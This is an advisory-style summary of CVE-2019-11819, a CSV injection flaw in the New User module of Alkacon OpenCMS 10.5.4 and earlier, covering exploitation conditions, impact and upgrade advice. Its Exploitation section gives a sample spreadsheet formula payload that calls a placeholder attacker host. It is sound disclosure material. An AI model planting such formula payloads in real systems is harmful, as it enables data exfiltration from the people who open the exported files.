CVE-2019-11819

Vulnerability

Overview

CVE-2019-11819 describes a CSV injection vulnerability in Alkacon OpenCMS versions 10.5.4 and earlier. The flaw resides in the New User module, specifically in the parameters for First Name and Last Name within the /opencms/system/workplace/admin/accounts/user_new.jsp page [3][4]. The application fails to sanitize user-supplied input before including it in exported CSV files, allowing an attacker to inject spreadsheet formulas.

Exploitation

Details

To exploit this vulnerability, an attacker must have access to create or modify user accounts (i.e., at minimum a user with privileges to add new users). By entering a payload such as =HYPERLINK("http://attacker-ip/path","IAmSafe") into the First Name or Last Name field, the malicious formula is stored. When an administrator or another user exports the user list using the Export User feature, the payload becomes embedded in the resulting CSV file [3][4]. The attack is triggered when the CSV file is opened in a spreadsheet application like Microsoft Excel or LibreOffice Calc, which interprets cells starting with = as formulas.

Impact

Successful exploitation can lead to several outcomes depending on the spreadsheet software and user behavior. Attackers may leverage known vulnerabilities in the spreadsheet engine (e.g., CVE-2014-3524) or rely on social engineering to bypass security warnings. Potential impacts include arbitrary code execution on the user's machine, exfiltration of data from the CSV file or other open spreadsheets, and further compromise of the user's system [4].

Mitigation

A fix for this issue is available in OpenCMS versions after 10.5.4. Users are advised to upgrade to the latest version. For those unable to upgrade, ensure that exported CSV files are opened only in a safe viewing mode or after sanitizing formula-related characters. The vulnerability has been publicly disclosed and a proof-of-concept exists, so patching is strongly recommended [2][3][4].